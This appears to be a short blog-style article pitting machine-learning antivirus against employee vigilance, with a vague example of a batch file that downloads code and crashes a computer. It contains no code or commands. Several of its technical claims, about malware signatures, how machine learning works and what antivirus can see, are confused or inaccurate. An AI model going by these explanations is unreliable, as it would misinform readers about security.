Here we are again. Man versus machine. On one corner, we have the machine capable of reading huge amounts of data in so little time, and on the other, an employee who knows nothing but to do his or her job to the best of their effort.
But against malware, who will fare better?
What is malware?
Malware has made it to the new vocabulary of “enemy files.” They’re not exactly viruses in that they have no specific signature. Instead, they have their own instruction, their own code that may or may not be intrusive at all, and sometimes (in fact, most of the time) they are not in the computer at all.
What is machine learning?
Machine learning is simple: If the computer sees it do something wrong once, it will learn that it is bad from then on. Say, for example, if I were a computer virus and I do something bad, even though the machine-learning antivirus doesn’t recognize me yet, as soon as I do something bad, the antivirus changes its stance against me , and voila! The antivirus has learned. Machine learning is magnificent, and in every way, effective.
Then again, only to a certain point.
What is Employee Vigilance?
Now here comes the other end of the ring: the employee. This is why companies hire tech personnel, sometimes even blue-hat hackers themselves to prove the antivirus wrong. You see, the antivirus can only see files, and ONLY files. What if the enemy is not in a file, but is instead in a code? An example of this is a simple batch file that downloads a malicious code, which in itself is also not very bad. However, the download mechanism creates a cascade, causing a denial of service in the CPU of the computer, causing it to crash.
There, that is where the tech team and the blue-hats come in.
Since antiviruses cannot discern wrong from right straight away, they only see the inner workings of the file. They only see the “signature” of the file, which, in the case of a virus, the “signature” of being a virus, may it be a Trojan, a worm, or spyware.
An employee sees far more than that. The employee and the blue-hat hacker sees the commands themselves, and from there, moves forward to a new set of instructions, ultimately preventing an attack. In our example given, this would mean saving the computer from a total denial of service.